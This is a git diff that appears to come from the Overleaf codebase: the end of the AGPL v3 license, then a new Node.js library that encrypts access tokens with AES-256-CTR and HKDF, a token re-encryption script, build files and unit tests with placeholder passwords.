their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. 
diff --git a/libraries/access-token-encryptor/README.md b/libraries/access-token-encryptor/README.md new file mode 100644 index 0000000..73607e5 --- /dev/null +++ b/libraries/access-token-encryptor/README.md @@ -0,0 +1,3 @@ +# Access Token Encryptor + +Used in third-party-references, to encrypt access tokens diff --git a/libraries/access-token-encryptor/buildscript.txt b/libraries/access-token-encryptor/buildscript.txt new file mode 100644 index 0000000..36fd724 --- /dev/null +++ b/libraries/access-token-encryptor/buildscript.txt @@ -0,0 +1,10 @@ +access-token-encryptor +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/access-token-encryptor/index.js b/libraries/access-token-encryptor/index.js new file mode 100644 index 0000000..5a466dd --- /dev/null +++ b/libraries/access-token-encryptor/index.js @@ -0,0 +1 @@ +module.exports = require('./lib/js/AccessTokenEncryptor') diff --git a/libraries/access-token-encryptor/lib/js/AccessTokenEncryptor.js b/libraries/access-token-encryptor/lib/js/AccessTokenEncryptor.js new file mode 100644 index 0000000..aa8078c --- /dev/null +++ b/libraries/access-token-encryptor/lib/js/AccessTokenEncryptor.js @@ -0,0 +1,164 @@ +const { promisify } = require('node:util') +const crypto = require('node:crypto') + +const ALGORITHM = 'aes-256-ctr' + +const cryptoHkdf = promisify(crypto.hkdf) +const cryptoRandomBytes = promisify(crypto.randomBytes) + +class AbstractAccessTokenScheme { + constructor(cipherLabel, cipherPassword) { + this.cipherLabel = cipherLabel + this.cipherPassword = cipherPassword + } + + /** + * @param {Object} json + * @return {Promise} + */ + async encryptJson(json) { + throw new Error('encryptJson is not implemented') + } + + /** + * @param {string} encryptedJson + * @return {Promise} + */ + async decryptToJson(encryptedJson) { + throw new Error('decryptToJson is not implemented') + } +} + +class AccessTokenSchemeWithGenericKeyFn extends AbstractAccessTokenScheme { + /** + * @param {Buffer} salt + * @return {Promise} + */ + async keyFn(salt) { + throw new Error('keyFn is not implemented') + } + + async encryptJson(json) { + const plainText = JSON.stringify(json) + + const bytes = await cryptoRandomBytes(32) + const salt = bytes.slice(0, 16) + const iv = bytes.slice(16, 32) + const key = await this.keyFn(salt) + + const cipher = crypto.createCipheriv(ALGORITHM, key, iv) + const cipherText = + cipher.update(plainText, 'utf8', 'base64') + cipher.final('base64') + + return [ + this.cipherLabel, + salt.toString('hex'), + cipherText, + iv.toString('hex'), + ].join(':') + } + + async decryptToJson(encryptedJson) { + const [, salt, cipherText, iv] = encryptedJson.split(':', 4) + const key = await this.keyFn(Buffer.from(salt, 'hex')) + + const decipher = crypto.createDecipheriv( + ALGORITHM, + key, + Buffer.from(iv, 'hex') + ) + const plainText = + decipher.update(cipherText, 'base64', 'utf8') + decipher.final('utf8') + try { + return JSON.parse(plainText) + } catch (e) { + throw new Error('error decrypting token') + } + } +} + +class AccessTokenSchemeV3 extends AccessTokenSchemeWithGenericKeyFn { + async keyFn(salt) { + const optionalInfo = '' + return await cryptoHkdf( + 'sha512', + this.cipherPassword, + salt, + optionalInfo, + 32 + ) + } +} + +class AccessTokenEncryptor { + constructor(settings) { + /** + * @type {Map} + */ + this.schemeByCipherLabel = new Map() + for (const 
cipherLabel of Object.keys(settings.cipherPasswords)) { + if (!cipherLabel) { + throw new Error('cipherLabel cannot be empty') + } + if (cipherLabel.match(/:/)) { + throw new Error( + `cipherLabel must not contain a colon (:), got ${cipherLabel}` + ) + } + const [, version] = cipherLabel.split('-') + if (!version) { + throw new Error( + `cipherLabel must contain version suffix (e.g. 2042.1-v42), got ${cipherLabel}` + ) + } + + const cipherPassword = settings.cipherPasswords[cipherLabel] + if (!cipherPassword) { + throw new Error(`cipherPasswords['${cipherLabel}'] is missing`) + } + if (cipherPassword.length < 16) { + throw new Error(`cipherPasswords['${cipherLabel}'] is too short`) + } + + let scheme + switch (version) { + case 'v3': + scheme = new AccessTokenSchemeV3(cipherLabel, cipherPassword) + break + default: + throw new Error(`unknown version '${version}' for ${cipherLabel}`) + } + this.schemeByCipherLabel.set(cipherLabel, scheme) + } + + /** @type {AbstractAccessTokenScheme} */ + this.defaultScheme = this.schemeByCipherLabel.get(settings.cipherLabel) + if (!this.defaultScheme) { + throw new Error(`unknown default cipherLabel ${settings.cipherLabel}`) + } + } + + promises = { + encryptJson: async json => await this.defaultScheme.encryptJson(json), + decryptToJson: async encryptedJson => { + const [label] = encryptedJson.split(':', 1) + const scheme = this.schemeByCipherLabel.get(label) + if (!scheme) { + throw new Error('unknown access-token-encryptor label ' + label) + } + return await scheme.decryptToJson(encryptedJson) + }, + } + + encryptJson(json, callback) { + this.promises.encryptJson(json).then(s => callback(null, s), callback) + } + + decryptToJson(encryptedJson, callback) { + this.promises + .decryptToJson(encryptedJson) + .then(o => callback(null, o), callback) + } +} + +module.exports = AccessTokenEncryptor diff --git a/libraries/access-token-encryptor/package.json b/libraries/access-token-encryptor/package.json new file mode 100644 index 0000000..b767f50 --- /dev/null +++ b/libraries/access-token-encryptor/package.json @@ -0,0 +1,28 @@ +{ + "name": "@overleaf/access-token-encryptor", + "version": "3.0.0", + "description": "", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "", + "license": "AGPL-3.0-only", + "dependencies": { + "lodash": "^4.17.21" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "typescript": "^5.0.4" + } +} diff --git a/libraries/access-token-encryptor/scripts/helpers/format-usage-stats.js b/libraries/access-token-encryptor/scripts/helpers/format-usage-stats.js new file mode 100644 index 0000000..f32f5fb --- /dev/null +++ b/libraries/access-token-encryptor/scripts/helpers/format-usage-stats.js @@ -0,0 +1,27 @@ +function formatTokenUsageStats(STATS) { + const prettyStats = [] + const sortedStats = Object.entries(STATS).sort((a, b) => + a[0] > b[0] ? 
1 : -1 + ) + const totalByName = {} + for (const [key, n] of sortedStats) { + const [name, version, collectionName, path, label] = key.split(':') + totalByName[name] = (totalByName[name] || 0) + n + prettyStats.push({ name, version, collectionName, path, label, n }) + } + for (const row of prettyStats) { + row.percentage = ((100 * row.n) / totalByName[row.name]) + .toFixed(2) + .padStart(6) + } + + if (prettyStats.length === 0) { + console.warn('---') + console.warn('Found 0 access tokens.') + console.warn('---') + } else { + console.table(prettyStats) + } +} + +module.exports = { formatTokenUsageStats } diff --git a/libraries/access-token-encryptor/scripts/helpers/re-encrypt-tokens.js b/libraries/access-token-encryptor/scripts/helpers/re-encrypt-tokens.js new file mode 100644 index 0000000..b39bede --- /dev/null +++ b/libraries/access-token-encryptor/scripts/helpers/re-encrypt-tokens.js @@ -0,0 +1,108 @@ +const _ = require('lodash') +const { formatTokenUsageStats } = require('./format-usage-stats') + +const LOG_EVERY_IN_S = parseInt(process.env.LOG_EVERY_IN_S || '5', 10) +const DRY_RUN = !process.argv.includes('--dry-run=false') + +/** + * @param {AccessTokenEncryptor} accessTokenEncryptor + * @param {string} encryptedJson + * @return {Promise} + */ +async function reEncryptTokens(accessTokenEncryptor, encryptedJson) { + return await new Promise((resolve, reject) => { + accessTokenEncryptor.decryptToJson(encryptedJson, (err, json) => { + if (err) return reject(err) + accessTokenEncryptor.encryptJson(json, (err, reEncryptedJson) => { + if (err) return reject(err) + resolve(reEncryptedJson) + }) + }) + }) +} + +/** + * @param {AccessTokenEncryptor} accessTokenEncryptor + * @param {Collection} collection + * @param {Object} paths + * @param {Object} queryOptions + * @return {Promise<{}>} + */ +async function reEncryptTokensInCollection({ + accessTokenEncryptor, + collection, + paths, + queryOptions, +}) { + const { collectionName } = collection + const stats = {} + + let processed = 0 + let updatedNUsers = 0 + let lastLog = 0 + const logProgress = () => { + if (DRY_RUN) { + console.warn( + `processed ${processed} | Would have updated ${updatedNUsers} users` + ) + } else { + console.warn(`processed ${processed} | Updated ${updatedNUsers} users`) + } + } + + const projection = { _id: 1 } + for (const path of Object.values(paths)) { + projection[path] = 1 + } + const cursor = collection.find( + {}, + { + ...queryOptions, + projection, + } + ) + + for await (const doc of cursor) { + processed++ + + let update = null + for (const [name, path] of Object.entries(paths)) { + const blob = _.get(doc, path) + if (!blob) continue + // Schema: LABEL-VERSION:SALT:CIPHERTEXT:IV + const [label] = blob.split(':') + let [, version] = label.split('-') + version = version || 'v2' + + const key = [name, version, collectionName, path, label].join(':') + stats[key] = (stats[key] || 0) + 1 + + if (version === 'v2') { + update = update || {} + update[path] = await reEncryptTokens(accessTokenEncryptor, blob) + } + } + + if (Date.now() - lastLog >= LOG_EVERY_IN_S * 1000) { + logProgress() + lastLog = Date.now() + } + if (update) { + updatedNUsers++ + + const { _id } = doc + if (DRY_RUN) { + console.log('Would upgrade tokens for user', _id, Object.keys(update)) + } else { + console.log('Upgrading tokens for user', _id, Object.keys(update)) + await collection.updateOne({ _id }, { $set: update }) + } + } + } + logProgress() + formatTokenUsageStats(stats) +} + +module.exports = { + reEncryptTokensInCollection, +} diff 
--git a/libraries/access-token-encryptor/test/setup.js b/libraries/access-token-encryptor/test/setup.js new file mode 100644 index 0000000..9af82f6 --- /dev/null +++ b/libraries/access-token-encryptor/test/setup.js @@ -0,0 +1,13 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') +const SandboxedModule = require('sandboxed-module') + +chai.use(chaiAsPromised) + +SandboxedModule.configure({ + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/access-token-encryptor/test/unit/js/AccessTokenEncryptorTests.js b/libraries/access-token-encryptor/test/unit/js/AccessTokenEncryptorTests.js new file mode 100644 index 0000000..9aab924 --- /dev/null +++ b/libraries/access-token-encryptor/test/unit/js/AccessTokenEncryptorTests.js @@ -0,0 +1,305 @@ +const chai = require('chai') +chai.should() +const { expect } = chai +const modulePath = '../../../index.js' +const SandboxedModule = require('sandboxed-module') + +describe('AccessTokenEncryptor', function () { + beforeEach(function () { + this.testObject = { hello: 'world' } + this.encrypted2015 = + '2015.1:473a66fb5d816bc716f278ab819d88a5:+mTg7O9sgUND8pNQFG6h2GE=' + this.encrypted2016 = + '2016.1:76a7d64a444ccee1a515b49c44844a69:m5YSkexUsLjcF4gLncm72+k=' + this.encrypted2019 = + '2019.1:627143b2ab185a020c8720253a4c984e:7gnY6Ez3/Y3UWgLHLfBtJsE=:bf75cecb6aeea55b3c060e1122d2a82d' + this.encrypted2023 = + '2023.1-v3:a6dd3781dd6ce93a4134874b505a209c:9TdIDAc8V9SeR0ffSn63Jj4=:d8b2de0b733c81b949993dce229abb4c' + this.badLabel = 'xxxxxx:c7a39310056b694c:jQf+Uh5Den3JREtvc82GW5Q=' + this.badKey = '2015.1:d7a39310056b694c:jQf+Uh5Den3JREtvc82GW5Q=' + this.badCipherText = '2015.1:c7a39310056b694c:xQf+Uh5Den3JREtvc82GW5Q=' + this.settings = { + cipherLabel: '2023.1-v3', + cipherPasswords: { + '2023.1-v3': '44444444444444444444444444444444444444', + }, + } + this.AccessTokenEncryptor = SandboxedModule.require(modulePath, { + globals: { + Buffer, + }, + }) + this.encryptor = new this.AccessTokenEncryptor(this.settings) + }) + + describe('invalid settings', function () { + it('should flag missing label', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '', + cipherPasswords: { '': '' }, + }) + ).to.throw(/cipherLabel cannot be empty/) + }) + + it('should flag invalid label with colon', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023:1-v2', + cipherPasswords: { '2023:1-v2': '' }, + }) + ).to.throw(/colon/) + }) + + it('should flag missing password', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherPasswords: { '2023.1-v3': '' }, + cipherVersions: { '2023.1-v3': 'v3' }, + }) + ).to.throw(/cipherPasswords.+ missing/) + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-v3', + cipherPasswords: { '2023.1-v3': undefined }, + }) + ).to.throw(/cipherPasswords.+ missing/) + }) + + it('should flag short password', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-v3', + cipherPasswords: { '2023.1-v3': 'foo' }, + }) + ).to.throw(/cipherPasswords.+ too short/) + }) + + it('should flag missing version', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1', + cipherPasswords: { 2023.1: '11111111111111111111111111111111' }, + }) + ).to.throw(/must contain version suffix/) + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-', + 
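+              // '2023.1-'.split('-') leaves an empty version string, so a
+              // trailing dash must be rejected just like a missing suffix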
cipherPasswords: { '2023.1-': '11111111111111111111111111111111' }, + }) + ).to.throw(/must contain version suffix/) + }) + + it('should flag invalid version', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-v0', + cipherPasswords: { + '2023.1-v0': '11111111111111111111111111111111', + }, + }) + ).to.throw(/unknown version/) + }) + + it('should flag unknown default scheme', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2000.1-v3', + cipherPasswords: { + '2023.1-v3': '11111111111111111111111111111111', + }, + }) + ).to.throw(/unknown default cipherLabel/) + }) + }) + + describe('sync', function () { + describe('encrypt', function () { + it('should encrypt the object', function (done) { + this.encryptor.encryptJson(this.testObject, (err, encrypted) => { + expect(err).to.be.null + encrypted.should.match( + /^2023.1-v3:[0-9a-f]{32}:[a-zA-Z0-9=+/]+:[0-9a-f]{32}$/ + ) + done() + }) + }) + + it('should encrypt the object differently the next time', function (done) { + this.encryptor.encryptJson(this.testObject, (err, encrypted1) => { + expect(err).to.be.null + this.encryptor.encryptJson(this.testObject, (err, encrypted2) => { + expect(err).to.be.null + encrypted1.should.not.equal(encrypted2) + done() + }) + }) + }) + }) + + describe('decrypt', function () { + it('should decrypt the string to get the same object', function (done) { + this.encryptor.encryptJson(this.testObject, (err, encrypted) => { + expect(err).to.be.null + this.encryptor.decryptToJson(encrypted, (err, decrypted) => { + expect(err).to.be.null + expect(decrypted).to.deep.equal(this.testObject) + done() + }) + }) + }) + + it('should not be able to decrypt 2015 string', function (done) { + this.encryptor.decryptToJson(this.encrypted2015, (err, decrypted) => { + expect(err).to.exist + expect(err.message).to.equal( + 'unknown access-token-encryptor label 2015.1' + ) + expect(decrypted).to.not.exist + done() + }) + }) + + it('should not be able to decrypt a 2016 string', function (done) { + this.encryptor.decryptToJson(this.encrypted2016, (err, decrypted) => { + expect(err).to.exist + expect(err.message).to.equal( + 'unknown access-token-encryptor label 2016.1' + ) + expect(decrypted).to.not.exist + done() + }) + }) + + it('should not be able to decrypt a 2019 string', function (done) { + this.encryptor.decryptToJson(this.encrypted2019, (err, decrypted) => { + expect(err).to.exist + expect(err.message).to.equal( + 'unknown access-token-encryptor label 2019.1' + ) + expect(decrypted).to.not.exist + done() + }) + }) + + it('should decrypt an 2023 string to get the same object', function (done) { + this.encryptor.decryptToJson(this.encrypted2023, (err, decrypted) => { + expect(err).to.be.null + expect(decrypted).to.deep.equal(this.testObject) + done() + }) + }) + + it('should return an error when decrypting an invalid label', function (done) { + this.encryptor.decryptToJson(this.badLabel, (err, decrypted) => { + expect(err).to.be.instanceof(Error) + expect(decrypted).to.be.undefined + done() + }) + }) + + it('should return an error when decrypting an invalid key', function (done) { + this.encryptor.decryptToJson(this.badKey, (err, decrypted) => { + expect(err).to.be.instanceof(Error) + expect(decrypted).to.be.undefined + done() + }) + }) + + it('should return an error when decrypting an invalid ciphertext', function (done) { + this.encryptor.decryptToJson(this.badCipherText, (err, decrypted) => { + expect(err).to.be.instanceof(Error) + 
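+          // badCipherText carries the retired '2015.1' label, so this surfaces
+          // as an unknown-label error rather than a decode failure (the async
+          // variant below asserts the exact message)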
expect(decrypted).to.be.undefined + done() + }) + }) + }) + }) + + describe('async', function () { + describe('encrypt', function () { + it('should encrypt the object', async function () { + const encrypted = await this.encryptor.promises.encryptJson( + this.testObject + ) + encrypted.should.match( + /^2023.1-v3:[0-9a-f]{32}:[a-zA-Z0-9=+/]+:[0-9a-f]{32}$/ + ) + }) + + it('should encrypt the object differently the next time', async function () { + const encrypted1 = await this.encryptor.promises.encryptJson( + this.testObject + ) + const encrypted2 = await this.encryptor.promises.encryptJson( + this.testObject + ) + encrypted1.should.not.equal(encrypted2) + }) + }) + + describe('decrypt', function () { + it('should decrypt the string to get the same object', async function () { + const encrypted = await this.encryptor.promises.encryptJson( + this.testObject + ) + const decrypted = await this.encryptor.promises.decryptToJson(encrypted) + expect(decrypted).to.deep.equal(this.testObject) + }) + + it('should not be able to decrypt a 2015 string', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.encrypted2015) + ).to.eventually.be.rejectedWith( + 'unknown access-token-encryptor label 2015.1' + ) + }) + + it('should not be able to decrypt a 2016 string', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.encrypted2016) + ).to.be.rejectedWith('unknown access-token-encryptor label 2016.1') + }) + + it('should not be able to decrypt a 2019 string', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.encrypted2019) + ).to.be.rejectedWith('unknown access-token-encryptor label 2019.1') + }) + + it('should decrypt a 2023 string to get the same object', async function () { + const decrypted = await this.encryptor.promises.decryptToJson( + this.encrypted2023 + ) + expect(decrypted).to.deep.equal(this.testObject) + }) + + it('should return an error when decrypting an invalid label', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.badLabel) + ).to.be.rejectedWith('unknown access-token-encryptor label xxxxxx') + }) + + it('should return an error when decrypting an invalid key', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.badKey) + ).to.be.rejectedWith('unknown access-token-encryptor label 2015.1') + }) + + it('should return an error when decrypting an invalid ciphertext', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.badCipherText) + ).to.be.rejectedWith('unknown access-token-encryptor label 2015.1') + }) + }) + }) +}) diff --git a/libraries/access-token-encryptor/tsconfig.json b/libraries/access-token-encryptor/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/access-token-encryptor/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/fetch-utils/.gitignore b/libraries/fetch-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/fetch-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/fetch-utils/.mocharc.json b/libraries/fetch-utils/.mocharc.json new file mode 100644 index 0000000..c492858 --- /dev/null +++ b/libraries/fetch-utils/.mocharc.json @@ -0,0 +1,6 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec", + "require": "test/setup.js" +} diff 